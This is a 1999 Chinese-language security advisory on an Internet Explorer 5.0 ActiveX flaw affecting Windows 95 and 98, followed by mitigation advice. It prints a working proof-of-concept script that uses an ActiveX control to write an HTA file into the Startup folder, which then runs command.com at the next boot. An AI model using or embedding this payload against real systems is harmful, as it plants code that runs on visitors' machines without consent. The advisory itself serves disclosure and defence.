安全研究

安全漏洞
IE 5.0 ActiveX 的重大漏洞

发布日期:1999-06-02
更新日期:1999-06-02

受影响系统:
Microsoft Windows 95
Microsoft Windows 98
不受影响系统:
Windows 2000 IE5.00.2919.800
描述:
这个漏洞主要就是AcriveX控件,它允许创建和覆写本地文件。黑客可以在IE用户点击网页上的一个超链接时发生,这个漏洞可以将HTML应用程序文件中的可执行程序添加在Windows 95或98计算机的开始菜单中,在该机器下次启动时,程序就会执行。



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

这个漏洞可以用下面的代码来测试:

<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('Written by Georgi Guninski http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>
</object>


建议:
1) 把安全级别设置为“High”
2) 或是把 Active Scripting 给屏蔽掉
3) 或把 ActiveX Controls 和 plug-ins 都给关了

浏览次数:9813
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障